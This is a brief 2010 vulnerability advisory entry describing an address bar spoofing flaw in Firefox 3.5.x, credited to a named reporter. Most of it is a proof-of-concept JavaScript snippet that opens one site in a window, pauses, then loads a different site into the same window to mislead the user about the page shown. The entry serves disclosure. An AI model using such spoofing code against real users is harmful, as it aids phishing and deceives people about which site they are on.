Mozilla Firefox 3.5.x Address Bar Spoofing Vulnerability

2010-07-24T00:00:00
ID SECURITYVULNS:DOC:24328
Type securityvulns
Reporter Securityvulns
Modified 2010-07-24T00:00:00

Description

Spoof Code:

<script language="javascript"> function pause(pd) { date = new Date(); var curDate = null; do { var curDate = new Date(); } while(curDate-date < pd); } function Spoofing () { win = window.open('http://www.google.com','new') pause (3000) win = window.open('http://www.Securitylab.ir','new') } </script> <a href="javascript: Spoofing()">Click Here</a>

Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com) Original Advisory: http://Securitylab.ir/Advisories